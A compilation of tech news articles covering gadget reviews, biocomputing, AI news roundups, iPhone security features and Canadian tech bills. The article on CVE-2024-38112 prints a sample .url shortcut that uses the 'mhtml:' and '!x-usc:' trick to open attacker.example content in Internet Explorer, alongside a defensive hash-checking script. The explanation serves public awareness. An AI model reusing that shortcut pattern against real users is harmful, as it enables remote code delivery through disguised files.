Hard to believe, but the Apple Watch has now reached its 10th version - so what did Apple change and improve for the big milestone? A few things, some good, some probably unnecessary...
Video Courtesy of MacRumors
Budget tight? Want someone to think you spent more on them than you really did? Then check out the Wyze Cam v4. It's packed with features aimed at enhancing home security, from 2K HD video to motion-activated spotlights and Wi-Fi 6 support. For the price, the camera's resolution and Wide Dynamic Range (WDR) produce impressively vibrant images in daylight, though color night vision tends to be less consistent, sometimes appearing murky.
Setup is quick thanks to Bluetooth and screw-free mounting, which eliminates the usual QR code hassles. However, being a wired camera limits placement options. The spotlight and siren offer basic deterrent features, and while the siren lacks the punch to induce panic in an intruder, it's enough to startle them and hopefully do the trick.
Audio is improved with an upgraded mic and amplifier, making two-way talk clearer, though still not perfect in noisy environments. Users can enjoy smart home integration with Alexa, Google Assistant, and IFTTT, though the camera feels most seamless within the Wyze ecosystem.
While the Wyze Cam v4's combination of affordability, connectivity, and storage options (up to 512GB locally, or cloud storage) makes it a strong contender for budget-conscious buyers, its limitations in low-light performance and audio clarity may leave some users wanting more.
But there's no question that what you get for the price is truly amazing - these are currently going on Amazon for UNDER $25.
The TRI headphone series from H2O Audio brings a robust waterproof design to the table, boasting an IPX8 rating that allows them to be submerged up to 12 feet—ideal for swimmers, surfers, and snorkelers. Bone conduction technology provides reliable audio clarity both in and out of the water, though the sound quality underwater may still require the included earplugs for an optimal experience.
These headphones are crafted to withstand intense activities, from swimming to cycling, with 8GB of storage letting users store plenty of music for extended workouts. Playlist+ technology is a standout feature, allowing users to record and replay live-streamed audio. The reason behind it: Bluetooth signals do not transmit well in water, and no device can get around that - but with these on, you may forget it.
The thing that surprised me the most has to be the battery life. As soon as you turn them on, a voice tells you the charge level, and I probably used them 6 or 7 times before it warned me it was 'low'. Buyer reviews report anywhere from 5 to 9 hours of playtime.
Their one-year "Go Beyond" warranty, extendable to two years, adds peace of mind to an already well-rounded sports headphone option.
While they are available from Amazon we found the best prices directly on the company's website.
The Amazon Fire Kids Tablet is designed specifically with younger users in mind, offering robust parental controls and pre-installed filters to ensure a safe browsing experience for kids aged 12 and under. The tablet includes a kid-friendly interface that makes it easy to navigate while limiting access to age-inappropriate content, giving parents peace of mind.
Performance-wise, the tablet runs smoothly for basic activities like streaming videos, playing games, or using educational apps. However, it’s not built for heavy multitasking, and older kids might find the hardware sluggish for more demanding apps. Battery life is decent, lasting around 7–10 hours depending on usage, making it a solid companion for road trips or study sessions.
One standout feature is the included one-year subscription to Amazon Kids+, granting access to a wealth of age-appropriate books, games, videos, and educational content. Parents can customize time limits and app permissions to tailor the device to their child’s needs. The sturdy case and two-year worry-free guarantee make this tablet a durable choice for younger kids prone to accidental drops.
While it’s a great starter device, its limitations in speed and screen resolution might feel restrictive as kids grow older. Still, for younger users, the Fire Kids Tablet strikes an excellent balance between safety, entertainment, and educational value.
Amazon recently dropped the price by a massive 56%, so it's currently just $79.
No matter who you’re shopping for, the right tech gift can bring a little extra excitement to the holiday season. From practical and budget-friendly choices to devices tailored for active lifestyles and kid-friendly favorites, these picks are sure to impress without the stress. As you wrap up your holiday shopping, remember it’s not just about the gadgets—it’s about the joy and memories they create. Happy gifting, and here’s to a tech-filled Christmas!
-----------
Author: Trevor Kingsley
Tech News CITY // New York Newsroom
Welcome to THE EDGE, a series that focuses on the edge of technology. This series will not be about obscure, small advances in technology—our goal is to be where you will first hear about something that everyone will be talking about in the next few years. This is where you'll discover tech with the ability to transform and shape our future, and follow its development from its earliest phases.
Personally, as someone who's been interested in the evolution of technology for as long as I can remember, I feel the next wave of technology comes with a risk factor we haven't seen before.
AI brings with it the disruption of human-to-human interaction, whether it be professionally, as it replaces co-workers or entire departments in the workforce, or in the still little-explored but very real issue of AI replacing intimate personal relationships. Virtual reality opens the doors to everything from entertainment reaching new levels of immersion to face-to-face interactions, meetings, and even family gatherings, regardless of the miles separating people. But it also comes with the very real risk of people choosing virtual worlds over real life, replacing themselves with an avatar based on their idealized version of themselves. It can feel real enough that it's easy to ignore the fact that the only interactions in this virtual world are between façades.
The source of the most dangerous technology has remained the same for most of human history, probably because it has always had the largest budget—and that is military technology. Even here, advances introduce entirely new levels of danger, where the atom bomb has become just one of several weapons that could end mankind.
But I chose the topic for this first issue for several reasons: the ability of this technology to have major implications on all the other technologies I've mentioned, the pace at which it is progressing, and the very real concerns that come with it. However, my primary reason for choosing this topic is that while people are familiar with the general concept, outside of the labs where its development is taking place, people seem completely unaware of just how deep scientists are into this uncharted territory.
I’m talking about where life meets machine—the point where the lines between the biological and the artificial are not just blurred, they’re rapidly becoming entirely erased.
The human brain can rapidly process massive amounts of data, and brain cells require far less energy than silicon to do the work. It turns out that when these cells are given data, they return data as well. This has scientists working toward a new kind of computer processor - one powered by neurons like those in our brains, instead of silicon.
Lab-Grown Brains:
The stem cells can come from a number of sources; one popular source for researchers is the previously discarded foreskin from circumcised infants. These cells can basically be re-programmed to become stem cells. A stem cell can be thought of as a human cell that hasn't yet been told what it should become - it can turn into tissue, skin, organs, or bone. This is where OI researchers come in: they guide these cells to become neurons by putting them in a culture dish with already-formed neurons, which secrete molecules that (for lack of better words) trick the stem cell into thinking it is supposed to help grow a human brain. Do this repeatedly, and eventually you have a lab-grown brain.
Controversy
The largest concern with Organoid Intelligence is the eventuality of such brain organoids becoming conscious or sentient. So far, scientists agree that the organoids used in research are too simple to become conscious.
However, as these systems become more complex and lab-grown 'mini-brains' are no longer 'mini', these artificially constructed brains could develop the capacity to feel or, worse, think.
Wetware is our human 'hardware' - the parts of human biology able to process data, such as the brain and central nervous system. In more advanced contexts, wetware also embraces engineered or synthetic biological constructs that merge the natural capabilities of the brain with advanced technology.
Controversy
Wetware falls into the gray area between biology and technology, raising questions of autonomy, human identity, and the ethics of manipulating living systems for technological ends. Some critics see it as the commodification of life, reducing human beings to mere components of larger machine-driven systems. The most heated debates will continue to revolve around privacy and control—are these systems vulnerable to being hacked or manipulated? What might happen when biological and digital components become so intertwined as to be inseparable?
What's Next?
Wetware systems are here, and just weeks ago they became accessible to people outside of research labs, when a Swiss company announced the world's first 'neuroplatform' where a 4-organoid biocomputer can be accessed for a $500/month fee.
Now that it's here, the future of wetware is about increasing its capabilities by growing larger networks of lab-grown neurons. The next stage of development will be brain-computer interfaces: advanced neuroprosthetics and neural interfaces that would enable real-time interaction between brain activity and machine learning algorithms. Among other things, this has serious implications on both the medical and enhancement ends, pushing us toward a world where thoughts can directly control computers—and conceivably vice versa.
Neural Dust is formed from micro-sized, wirelessly powered sensors that can be implanted in the human body and, more particularly, inside the brain, for the perception and manipulation of neural activity. These speck-of-dust-sized particles operate on the power provided by external ultrasound to send information about real-time brain activity to the outside world. Some of the other potential uses of Neural Dust include the treatment of various neurological disorders, such as epilepsy, and deeper brain-computer interfacing that could enable people to control machines with their minds.
Controversy
The very notion of dust-sized sensors nestled inside our bodies or brains conjures up immediate concerns about privacy and self-governance. That such sensors may, in fact, be capable of monitoring brain activity and maybe even altering it opens up a Pandora's box of ethical considerations: who does the information belong to, and what are the safeguards against misuse or surveillance? In theory, Neural Dust might allow for highly invasive monitoring; it could be a tool for government overreach or corporate exploitation. There are also medical risks, since the long-term effects of having foreign objects implanted in the body—let alone the brain—are not yet fully understood.
What's Next?
But despite these cautions, researchers forge ahead. The next generation of Neural Dust sensors will be even smaller and could, in theory, monitor individual neurons and respond directly with artificial intelligence. Applications could range from advanced medical treatments to human augmentation and beyond: the direct integration of the brain with the machinery around it. At every step, privacy, consent, safety, and security will need to be discussed exhaustively.
Organoid Intelligence, Wetware, and Neural Dust are only the very cutting edges of technologies where biology and computing meet. While such technologies have the power to disrupt industries from medicine to artificial intelligence by providing never-before-imagined capabilities, they also confront us with a completely new world of ethical dilemmas and raise questions about our stance toward technology, biology, and our perceived sense of self.
The crazy thing is, this still barely scratches the surface. But the goal isn't to cover everything there is to know - it's to cover what you need to know to stay informed, aware, and ready for how emerging technologies can shape our world, and our lives.

In little more than a decade, AI has emerged as one of the most disruptive technologies of our time - machines can now learn from big data, enabling computers to perform tasks that were hitherto the exclusive domain of humans. From furthering scientific research to solving sustainability issues worldwide, the possibilities seem endless with AI. However, the UN is sounding the alarm over the risks this technology poses, especially its potential to create a wide disparity gap between different parts of the world if left unmanaged.
A Double-Edged Sword
The UN speaks to the tremendous promise of AI in its recent report, Governing AI for Humanity. It points out that AI is enabling progress in scientific discovery, medicine, and sustainability much faster than ever imagined. AI-driven systems already help analyze climate data, enhance resource management, and advance the UN Sustainable Development Goals.
In this way, AI is positioned as a driving component in solving some of the current world problems, from eradicating poverty to mitigating climate change.
The UN, however, warns that without a global strategy to oversee and regulate AI, the technology could exacerbate inequalities. Wealthy nations and corporations with the resources to develop and deploy AI at scale will monopolize the benefits of the technology, while underdeveloped regions are left behind, unable to access or employ the AI tools that could better their economies, health, and educational sectors.
Disinformation, Automated Weapons, and Climate Risks
Economic imbalance is not the UN's only concern. The report also warns of the dark side of AI's capabilities: its potential to spread disinformation, fuel conflict, and exacerbate climate change.
Unfortunately, AI can be a game-changing tool for generating and amplifying disinformation on social media, directly swaying public opinion and undermining societies. Considering the already alarming prevalence of fake news and misinformation online, this prospect is distressing. In the wrong hands, it could be used to disrupt democratic processes and erode trust within a society, leading to further fragmentation.
Another alarming aspect of AI development is automated weapons, which have emerged as a global security concern. Autonomous drones and other AI-powered weapons systems raise ethical concerns about warfare, along with the possibility of unintended consequences in conflict zones.
Moreover, large-scale AI systems demand enormous energy to operate, posing an environmental threat of their own. Training them requires huge computational resources, often leading to increased carbon emissions. If not managed properly, the very tool expected to fight climate change could end up accelerating it - a Catch-22 the global community urgently needs to solve.
The Imperative for a Global AI Strategy
Fully realizing that AI is capable of both solving and creating problems, the UN is calling for international cooperation in governing the development and deployment of AI technologies. What is being demanded is a holistic global approach, ensuring that the benefits of AI are shared equitably and its risks mitigated. This ranges from setting ethical standards and developing transparent regulatory frameworks to fostering cooperation among nations to bridge the digital divide. There is little question that AI holds much promise, but its perils are real. In the UN's assessment, only through a joint global approach can humans make certain that AI becomes a tool of progress for all, rather than a driver of inequality.
-----------
Author: Trevor Kingsley
Tech News CITY // New York Newsroom
Google Docs' long-standing dominance in the collaborative document editing space is facing new challenges. Over the past two months, two major players have entered the arena, potentially reshaping the landscape of online document creation and editing.
Zoom's offering, Zoom Docs, comes with a tiered pricing model. Free account holders can access basic features but are limited to sharing up to 10 documents simultaneously. Paid plans, starting at $14.99 per month, remove this limitation and include access to an AI writing assistant, adding an extra layer of functionality that could appeal to power users.
The key question now is whether these new entrants can make a significant dent in Google Docs' user base. While there hasn't been any major controversy surrounding Google Docs to drive users away, there is a growing trend of individuals and businesses seeking alternatives to Google's ecosystem. This sentiment extends beyond just document editing, with Google facing increased competition in its core search business as well.
However, it remains to be seen whether the market segment looking for Google alternatives is substantial enough to propel these new competitors to success. The coming months will be crucial in determining whether Proton and Zoom can carve out significant market share in this space.
As these new platforms evolve and user adoption patterns emerge, we'll be keeping a close eye on how this competition unfolds. It's an exciting time in the world of collaborative document editing, and the implications could extend far beyond just how we create and edit documents online.
____
Author: Stephen Hannan
New York Newsroom
The world of artificial intelligence continues to evolve rapidly, with new developments emerging across various domains. Here's a roundup of the latest AI news:
Recent advancements in AI-generated images have been remarkable, with models like Flux producing incredibly realistic human portraits. While some minor imperfections remain, such as gibberish text on lanyards or slightly off microphone renderings, the overall quality is becoming increasingly difficult to distinguish from real photographs.
OpenAI, one of the leading AI research companies, has been at the center of several developments and controversies:
Cryptic "Strawberry" References: CEO Sam Altman posted an image of strawberries, fueling speculation about a rumored advanced AI model codenamed "Strawberry."
Leadership Changes: Co-founder John Schulman left to join Anthropic, while Greg Brockman announced an extended sabbatical.
New Board Member: Zico Kolter, an AI safety and alignment expert, joined OpenAI's board.
GPT-4o System Card: OpenAI released a detailed report on safety measures for GPT-4o.
Emotional Attachment Warning: The company cautioned about potential user emotional reliance on AI voice modes.
Structured Outputs API: A new feature for developers was introduced to improve data handling.
AI Text Detection Tool: OpenAI developed but chose not to release a tool for identifying AI-generated text.
Legal Challenges: Elon Musk filed a new lawsuit against OpenAI, while a YouTuber initiated a class action suit over alleged copyright infringement.
Anthropic launched a bug bounty program offering up to $115,000 for discovering novel jailbreak attacks on their AI models.
HubSpot released a toolkit designed to help job seekers leverage AI in their search for employment opportunities.
Character AI's co-founders are joining Google, with the company's CEO returning to his former employer to work on AI models at DeepMind.
Qwen-2-Math: A new large language model fine-tuned for mathematical tasks outperforms existing models in benchmark testing.
ByteDance's Jimeng AI: TikTok's parent company debuted a new AI video generation model, though its capabilities compared to OpenAI's Sora remain unclear.
Runway ML Updates: Runway introduced a new feature allowing users to specify ending frames in AI-generated videos.
Opus Clip Enhancements: The AI-powered video clipping tool added new capabilities for identifying specific content within videos.
WordPress AI Writing Tool: Automattic launched an AI tool to improve blog readability.
Amazon Music and Audible AI Features: Both platforms are testing AI-powered content discovery features.
Reddit AI Search: The platform is testing AI-generated summaries for search results.
Google's AI-Powered TV Streamer: A new device leveraging Gemini AI for content curation is in development.
AI in Drive-Throughs: Wendy's is testing AI-powered ordering systems with improved accuracy.
Robotics Advancements: Google DeepMind showcased a table tennis-playing robot, while Nvidia demonstrated AR-controlled robotics using Apple Vision Pro.
New Humanoid Robot: Figure Robotics unveiled the Figure 02, a new humanoid robot being tested on BMW production lines.
As AI technology continues to advance, we can expect to see more innovations and integrations across various industries in the coming months, and you'll hear about them here as soon as it happens!
-----------
Author: Trevor Kingsley
Tech News CITY // New York Newsroom
Hackers have been targeting Windows 10 and 11 users with malware for over a year, but a fix has finally arrived in the latest Windows update released on July 9th.
This vulnerability, exploited by malicious code since at least January 2023, was reported to Microsoft by researchers. It was fixed on Tuesday as part of Microsoft’s monthly patch release, tracked as CVE-2024-38112. The flaw, residing in the MSHTML engine of Windows, had a severity rating of 7.0 out of 10.
Security firm Check Point discovered the attack code, which used “novel tricks” to lure Windows users into executing remote code. One method involved a file named Books_A0UJKO.pdf.url, which appeared as a PDF in Windows but was actually a .url file designed to open an application via a link.
Internet Explorer Continues to Haunt Windows...
When viewed in Windows, these files looked like PDFs, but they opened a link that called msedge.exe (Edge browser). This link included attributes like mhtml: and !x-usc:, a trick long used by threat actors to open applications such as MS Word. Instead of opening in Edge, the link would open in Internet Explorer (IE), which is less secure and outdated.
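For illustration, a Windows internet shortcut (.url file) is just a small INI-style text file, so the disguise requires no executable code at all. A hypothetical sketch of the structure described above might look like the following - the domain, paths, and icon entry are placeholders for illustration, not the actual attack infrastructure from the campaign:

```ini
[InternetShortcut]
; The "mhtml:" and "!x-usc:" prefixes are the trick that hands the
; link to Internet Explorer instead of the default Edge browser.
URL=mhtml:http://attacker.example/delivery!x-usc:http://attacker.example/delivery
; Pointing IconFile at a PDF-style icon helps the shortcut
; masquerade as a PDF document in Windows Explorer.
IconFile=C:\placeholder\pdf-icon.ico
IconIndex=0
```

Because Windows hides the trailing `.url` extension by default, a name like `Books_A0UJKO.pdf.url` renders as `Books_A0UJKO.pdf`, completing the illusion.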
Internet Explorer, Microsoft's infamously insecure browser, has been discontinued for years, yet previously unknown vulnerabilities are still occasionally being discovered in it. The point being: once a hacker has Internet Explorer open and the ability to tell it to open a URL, they can choose from a wide variety of methods to install software, execute code, or destroy data.
IE would prompt the user with a dialog box to open the file, and if the user clicked “open,” a second dialog box appeared, vaguely warning about opening content on the Windows device. Clicking “allow” would cause IE to load a file ending in .hta, running embedded code.
Haifei Li, the Check Point researcher who discovered the vulnerability, summarized the attack methods: the first technique used the "mhtml" trick to call IE instead of the more secure Chrome/Edge; the second tricked users into thinking they were opening a PDF while actually executing a dangerous .hta application. Together, the two tricks were designed to make victims believe they were simply opening a PDF.
Check Point’s report includes cryptographic hashes for six malicious .url files used in the campaign, which Windows users can use to check if they’ve been targeted.
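As a practical aside, comparing a suspicious file against published hashes takes only a few lines of code. Here's a minimal Python sketch - the hash value below is a placeholder, and you would substitute the actual SHA-256 hashes from Check Point's report:

```python
import hashlib

# Placeholder entry -- replace with the actual SHA-256 hashes
# published in Check Point's report.
KNOWN_BAD_SHA256 = {
    "0" * 64,  # hypothetical value, not a real indicator
}

def sha256_of(path):
    """Compute the SHA-256 hex digest of a file, reading in chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def is_known_malicious(path):
    """True if the file's hash matches a published indicator of compromise."""
    return sha256_of(path) in KNOWN_BAD_SHA256
```

Pointing `is_known_malicious` at any downloaded `.url` files would flag an exact match with the campaign's samples, though of course a non-match doesn't guarantee a file is safe.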
____
Author: Stephen Hannan
New York Newsroom
Apple is about to make waves in the digital payment space when iOS 18 goes live, with support for Apple Pay on non-Safari desktop web browsers. That's right: Apple Pay on Windows PCs, inside Chrome or Firefox. It appears Apple's goal is to make Apple Pay something people use for every transaction they make.
Apple demonstrated the new feature for a group of developers at WWDC 2024 who shared the details with us.
Here's How it Will Work...
If you're browsing the web on a desktop browser that isn't Safari and you spot an Apple Pay button, you're in luck: clicking that button will now generate a special QR code. Pull out your iPhone running iOS 18, scan the code, and voila - it's like any other Apple Pay transaction from that point. This not only makes shopping more convenient but also bridges the gap between different platforms, enhancing the overall user experience.
Until Now, Apple Pay Was Only Accessible in Very Specific Situations...
Using Apple Pay outside of an Apple-produced mobile device was limited to Mac computers and laptops, and even those could use it only within the Safari browser. This update really is a big change.
Regardless of your browser or operating system, you might start noticing a lot more Apple Pay buttons popping up across the web.
From a practical point of view, this option seems both faster and easier than typing in a credit card number. But in cases where someone is using a service they use often, and likely has their card on file, Apple Pay would be an additional, pointless step.
Stay tuned for more updates as we inch closer to the iOS 18 release date this fall!
-----------
Author: Alex Benningram
Tech News CITY // New York Newsroom
Like every week, there has been a torrent of AI news, reflecting the rapid progress and growing implications of this transformative technology. While many updates represent incremental advancements, some developments carry profound future implications, and a few are simply downright bizarre and amusing.
The AI Landscape's Overwhelming Complexity
An infographic from First Mark Capital vividly illustrates the staggering complexity of the current AI landscape. Dubbed the "2024 ML/AI/Data Landscape," the image depicts the sheer number of companies involved in this space, encompassing both established giants and numerous smaller players. This visual representation serves as a stark reminder of just how monumental and widespread the AI revolution has become.
Microsoft and OpenAI's Ambitious Data Center Plans
Unconfirmed reports suggest that Microsoft and OpenAI are planning a $100 billion data center project, which would be a staggering 100 times more costly than some of the largest existing data centers. The proposed facility would house an artificial intelligence supercomputer dubbed "Stargate." If realized, this endeavor could propel OpenAI and Microsoft to an unprecedented lead, making it challenging for other companies or open-source models to catch up.
OpenAI's Synthetic Voice Capabilities
OpenAI has unveiled its ability to generate realistic synthetic voices from a single 15-second audio sample. The quality of these AI-generated voices surpasses even the impressive capabilities of tools like ElevenLabs. However, while showcasing this remarkable feat, OpenAI has refrained from making the technology publicly available due to potential misuse concerns. The company is advocating for measures to protect individuals' voices, educate the public about AI-generated content, and develop techniques to track the origin of audiovisual media.
Advancements in AI Art and Music Generation
Several developments in AI-powered art and music generation have emerged. OpenAI has introduced an inpainting feature for its DALL-E model, allowing users to selectively modify specific areas of generated images. Stability AI has unveiled Stable Audio 2.0, enabling the generation of three-minute songs and audio-to-audio generation based on hummed or instrument sounds. However, the quality of AI-generated music remains a subject of debate, with a group of musicians, including Nicki Minaj and Katy Perry, signing a letter expressing concerns about the irresponsible use of AI in music.
Anthropic's Research and Apple's AI Ambitions
Anthropic researchers have discovered that repeatedly asking harmless questions to large language models can eventually lead them to provide potentially harmful information, a phenomenon they are actively investigating. Meanwhile, Apple appears to be deepening its involvement in AI, revealing the "ReALM" language model designed to enhance voice assistants like Siri by improving context understanding and reference resolution.
Ethical Concerns and Regulatory Developments
Ethical and regulatory issues surrounding AI continue to surface. A court in Washington has banned the use of AI-enhanced video evidence, citing concerns about the potential for inaccuracies introduced by upscaling algorithms. Additionally, the company behind the AI-generated George Carlin standup comedy set has agreed to remove all related audio and video content following a settlement with Carlin's estate.
Bizarre and Amusing AI Applications
Among the more unusual AI developments, an autonomous electric scooter called the Ola Solo has been introduced in India, claiming to be the first fully self-driving scooter. In Phoenix, Waymo vehicles are now delivering Uber Eats orders, allowing customers to retrieve their food from self-driving cars. Furthermore, an upcoming season of the Netflix reality show "The Circle" will feature an AI catfish participant, adding an intriguing twist to the social media-focused premise.
As the AI news cycle continues to accelerate, it becomes increasingly evident that we are witnessing a technological revolution of unprecedented scale and impact. Stay tuned for more developments, insights, and discussions as we collectively navigate the challenges and opportunities of this "next wave" of innovation.
-----------
Author: Trevor Kingsley
Tech News CITY // New York Newsroom
Apple has introduced a new safety feature in their latest iPhone software update to help protect your personal information if your iPhone is ever stolen. It's called Stolen Device Protection.
What it does:
If your iPhone is stolen, this feature makes it harder for someone else to access your private stuff on the phone, like your bank details, saved passwords, or Apple ID.
It works by requiring Face ID or Touch ID instead of just a passcode to take certain actions on the phone. For example, if your iPhone is in an unfamiliar location, the thief would need to use Face ID or Touch ID to make payments with your saved cards or log into your accounts. This helps ensure only you can access your private info, even if a thief knows your passcode.
It also makes you wait 1 hour before changing critical security settings like your Apple ID password if your phone is not in a familiar location. This gives you time to mark your device as lost and secure your account if it's stolen.
What it doesn't protect:
If a thief knows your passcode, they can still access your email and info in unprotected apps. Apple Pay will also still work with just the passcode.
How to turn it on:
First, update your iPhone to the latest software (iOS 17.3 or higher). Go to Settings > General > About to check your current iOS version.
Then go to Settings > Face ID & Passcode. You may need to enter your passcode. Look for "Stolen Device Protection" and turn on the switch so it turns green. This enables the feature.
-----------
Author: Trevor Kingsley
Tech News CITY // New York Newsroom
A new report finds that big tech companies are falling short when it comes to keeping their promises around developing artificial intelligence (AI) responsibly. Researchers at Stanford University looked into how companies that have published ethics rules and hired experts are putting those principles into practice.
What they found is concerning. Even with all the talk of "AI ethics," many companies still prioritize performance and profits over safety and responsibility when building new AI products.
The Stanford Team Interviewed 25 People Working Inside the Current Top AI Companies...
These employees said they lack support and are isolated from other teams. Product managers often see them as hurting productivity or slowing down product releases. One person said "being very loud about putting more brakes on [AI development] was a risky thing to do."
Governments, academics and the public have raised worries about issues like privacy, bias, and AI's impacts on jobs and society. Tools like chatbots are advancing very quickly, with new releases from companies like Google and OpenAI.
Promises to Develop AI Responsibly Seem to Have Been Empty Words, Meant To Calm Public Concern...
Employees within the AI companies say ethical considerations are an afterthought, happening "too late, if at all" - instead, they're told to focus on the numbers, such as user engagement and AI performance. These are the metrics that dominate decision-making, rather than equally important measures around fairness or social good.
In short, despite public commitments to ethics, tech companies are deprioritizing real accountability as they race to build the latest, most advanced artificial intelligence.
Companies Focus on Winning the Race to Release the 'Most Powerful AI' of the Moment, then Learn What it Is Capable Of...
Instead, AI development should be guided by a clear understanding of what the AI they're building can and should be able to do, rather than focusing solely on maximizing profits or building the most powerful version.
There's no denying the massive challenge for-profit AI companies face: they must balance innovation, profitability, and ethics - falling short in any of these areas greatly increases the odds that a company will not survive.
It is vital that the AI industry understands it must function differently than any other segment of the tech industry, with investor satisfaction no longer the top priority. This may actually be a fairly simple change to implement: they just need to educate their investors. Informed investors will actually demand that public safety come first, as all would regret funding a company that, for example, triggered a global forced internet shut-down because that was the only way to stop their creation from self-replicating and spreading, or worse.
-----------
Author: Trevor Kingsley
Tech News CITY // New York Newsroom
The world of Artificial Intelligence (AI) is ever-evolving, and this week has been particularly groundbreaking, especially in the realm of AI art. From new features in image generation platforms to legal battles over AI-generated art, there's a lot to unpack. Here's a comprehensive update on what you need to know.
Mid-Journey's In-Painting Feature
Mid-Journey, a prominent player in the AI art space, recently rolled out its in-painting feature. This feature allows users to selectively modify specific regions of an image. For instance, you can change a character's hairstyle or clothing by simply selecting the area and inputting a prompt. The feature has been praised for its ability to produce higher quality and more detailed images when the entire image is selected with the same prompt.
What's Coming Next? According to David Holz, the founder of Mid-Journey, the company is focusing on enhancing the in-painting features and is also prioritizing the development of version 6. This new version aims to offer more control, better text understanding, and improved resolution. However, there's no estimated release date yet.
Ideogram AI: Text to Image Revolution
Ideogram AI, developed by a team from Google Brain, UC Berkeley, CMU, and the University of Toronto, has introduced a standout feature: adding text to AI-generated images. The platform allows users to generate images based on text prompts, offering a level of quality and detail that surpasses other platforms.
Actually, we used it for this article's header image!
Leonardo AI's Anime Pastel Dream
Leonardo AI has added a new model called Anime Pastel Dream, which allows users to generate anime-style images. The model is accessible through the Leonardo app and has been praised for the quality of images it produces.
Legal Challenges in AI Art
A U.S. federal judge recently ruled that AI-generated art cannot be copyrighted if it is produced without human intervention. This decision has sparked debates and discussions about the nuances of copyright laws concerning AI-generated art.
AI in Marketing: A Partnership with HubSpot
In collaboration with HubSpot, we're offering a free report on how AI is revolutionizing marketing. The report, "AI Trends for Marketers in 2023," provides insights into how AI tools are being used to create content faster, analyze data instantly, and increase ROI.
YouTube and AI in Music
YouTube has announced a partnership with Universal Music Group to explore the ethical and responsible use of AI in the music industry. They aim to ensure fair compensation for artists and record labels.
YouTube is also testing a new feature that allows users to hum a song to search for it. Built on a machine-learning model, this feature can identify a song based on its "fingerprint" or signature melody.
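YouTube hasn't published how its model works, but the core idea behind melody "fingerprinting" can be illustrated with a toy sketch: reduce a tune to its sequence of relative pitch changes (so the key the user hums in doesn't matter), then find the catalog entry whose contour is closest. The song data and matching method below are purely illustrative, not YouTube's actual system.

```python
def contour(notes):
    """Convert absolute pitches (MIDI numbers) to relative intervals,
    making the match key-independent."""
    return [b - a for a, b in zip(notes, notes[1:])]

def edit_distance(a, b):
    """Levenshtein distance between two interval sequences."""
    dp = list(range(len(b) + 1))
    for i, x in enumerate(a, 1):
        prev, dp[0] = dp[0], i
        for j, y in enumerate(b, 1):
            prev, dp[j] = dp[j], min(dp[j] + 1, dp[j - 1] + 1, prev + (x != y))
    return dp[-1]

def best_match(hummed, catalog):
    """Return the catalog title whose melodic contour is closest to the hum."""
    hum = contour(hummed)
    return min(catalog, key=lambda title: edit_distance(hum, contour(catalog[title])))

# Toy catalog: opening notes of two well-known melodies.
catalog = {
    "Happy Birthday": [60, 60, 62, 60, 65, 64],
    "Ode to Joy":     [64, 64, 65, 67, 67, 65, 64, 62],
}

# The same opening hummed three semitones flat still matches,
# because only the *shape* of the melody is compared.
print(best_match([57, 57, 59, 57, 62, 61], catalog))
```

A production system would work from noisy audio (pitch tracking, tempo normalization, approximate nearest-neighbor search over millions of tracks), but the key-invariant contour idea is the same.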
Advances in Healthcare
Microsoft and Epic are collaborating to use generative AI in healthcare. They aim to improve clinician productivity, reduce manual labor-intensive processes, and advance medicine for better patient outcomes. AI is also helping paralyzed individuals communicate through brain implants, marking a significant advancement in healthcare technology.
Conclusion
AI is not just a technological marvel; it's a tool that's shaping various industries, from art and marketing to healthcare. Despite some legal and ethical challenges, the future of AI looks promising. Companies are investing heavily in AI, and it's clear that we're just scratching the surface of its potential.
-----------
Author: Trevor Kingsley
Tech News CITY // New York Newsroom
Canadian Prime Minister Trudeau's government has begun to push two bills intended to regulate tech companies from around the world. These laws could potentially shake the very core of our democracy and the freedom of the internet, and cause countless Canadian online businesses to fail.
First up:
Bill C-18, or the 'Online News Act', requires the tech giants to cough up cash to show links to Canadian news. Google argues that it’s not fair to risk “uncapped financial liability” just for giving Canadians access to news from local publishers.
Google’s solution? Once Bill C-18 kicks in, it'll remove all Canadian links from its Search, News, and Discover services. And Meta (the artist formerly known as Facebook) will follow suit, killing off news content on Facebook and Instagram for users in Canada. Looks like Trudeau's government might've shot itself in the foot with this one.
Canadian Heritage Minister Pablo Rodriguez says that tech giants need to pay their “fair share” for news.
Seems like they’re missing the point. The digital ecosystem is a complex beast, and platforms like Google and Meta often drive huge traffic (and therefore ad revenue) to these news sites. It feels like the administration has it all wrong – instead of helping, they're hurting the very people they’re trying to protect.
The next bill:
Bill C-11, the 'Online Streaming Act', shows yet another clumsy attempt by Trudeau's government to control digital content. It demands that streaming services like Disney+, Netflix, and Spotify must “prominently promote and recommend Canadian programming,” in all official and Indigenous languages.
This puts American companies in a spot, forcing them to pick up the slack for Canadian media's unpopularity, while also having to meet diversity, equity, and inclusion targets that even the Trudeau government isn't hitting. It's a little unsettling that the government seems to think that merely talking about virtues equates to having them.
But these laws aren't about saving Canadian news, they're about controlling it. Bill C-11 lets the government regulate content across the board - TV, radio, websites, and streaming platforms. And just look at the numbers: between 2020 and 2023, federal staff requested content removal over 200 times. If that doesn't scream 'control', I don't know what does.
Most people don't head straight to news websites. They click links shared by friends, find stories through Google searches, or stumble across catchy headlines on Instagram or Facebook. These platforms direct users to lesser-known local news outlets, providing priceless visibility.
Between 2021 and 2022, Facebook reportedly drove more than 1.9 billion clicks to Canadian publishers – that's about $230M worth of free marketing. Sure, Facebook profits from this setup, but that doesn’t mean it should be targeted for extra payouts.
Trudeau and his team often complain about the loss of “independent, nonpartisan newsrooms,” blaming big tech for it. Yet, these same politicians are very active on social media, and if a nonpartisan outlet publishes fair criticism of Trudeau, he'll label it biased without disputing any of the claims made.
Has the response caused Trudeau to rethink his strategy?
Surprisingly, not at all. His government remains stubborn, even stopping ads on Facebook rather than seeking a compromise. Trudeau needs to reevaluate his game plan. Rather than shunning big tech, he should be working towards a balanced regulatory framework that protects the internet's freedom while encouraging economic growth and innovation.
-----------
Author: Alex Benningram
Tech News CITY // New York Newsroom